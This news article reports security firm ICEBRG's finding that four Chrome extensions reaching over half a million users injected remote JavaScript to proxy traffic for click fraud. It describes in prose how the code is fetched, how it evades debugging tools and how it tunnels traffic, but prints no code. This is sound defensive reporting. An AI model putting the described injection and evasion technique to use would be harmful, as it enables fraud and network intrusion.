Four malicious Chrome extensions managed to infect over half a million users worldwide, including employees of major organizations, ICEBRG reports.
The extensions were likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, but they could have also been used by threat actors to gain access to corporate networks and user information, the security company warns.
The malicious extensions were discovered after observing an unusual spike in outbound traffic volume from a customer workstation to a European VPS provider, ICEBRG reveals. The HTTP traffic was associated with the domain ‘change-request[.]info’ and was generated from a Chrome extension named Change HTTP Request Header.
While the extension itself does not contain “any overtly malicious code,” the researchers discovered the combination of “two items of concern that” could result in the injection and execution of arbitrary JavaScript code via the extension.
Chrome can execute JavaScript code contained within JSON but, due to security concerns, extensions aren’t allowed to retrieve JSON from an external source, but need to explicitly request its use via the Content Security Policy (CSP).
When the permission is enabled, however, the extension can retrieve and process JSON from an externally-controlled server, which allows extension authors to inject and execute arbitrary JavaScript code when the update server receives a request.
What ICEBRG researchers discovered was that the Change HTTP Request Header extension could download obfuscated JSON files from ‘change-request[.]info’, via an ‘update_presets()’ function. The obfuscated code was observed checking for native Chrome debugging tools and halting the execution of the infected segment if such tools were detected.
After injection, the malicious JavaScript creates a WebSocket tunnel with ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.
“During the time of observation, the threat actor utilized this capability exclusively for visiting advertising related domains indicating a potential click fraud campaign was ongoing. Click fraud campaigns enable a malicious party to earn revenue by forcing victim systems to visit advertising sites that pay per click (PPC),” ICEBRG reports.
The capability, however, can also be used by the threat actor to browse internal sites of victim networks, thus effectively bypassing perimeter controls.
The security researchers also discovered that Change HTTP Request Header wasn’t the only Chrome extension designed to work in this manner. Nyoogle – Custom Logo for Google, Lite Bookmarks, and Stickies – Chrome’s Post-it Notes show similar tactics, techniques, and procedures (TTPs) and feature the same command and control (C&C).
The Stickies extension was also observed using a different code injection pathway, but injecting JavaScript code nearly identical to that of other malicious extensions. It appears that the extension has a history of malicious behavior, as it was observed in early 2017 to be using the new code injection technique following an update.
“The inherent trust of third-party Google extensions, and accepted risk of user control over these extensions, allowed an expansive fraud campaign to succeed. In the hands of a sophisticated threat actor, the same tool and technique could have enabled a beachhead into target networks,” ICEBRG notes.
Considering the total installed user base of these malicious Chrome extensions, the malicious actor behind them has a substantial pool of resources to use for financial gain. Google, the National Cyber Security Centre of The Netherlands (NCSC-NL), the United States Computer Emergency Readiness Team (US-CERT), and customers who were directly impacted have been alerted on the issue.
Related: Hijacked Extensions Put 4.7 Million Chrome Users at Risk
Related: Unpatched Vulnerabilities Impact Popular Browser Extension Systems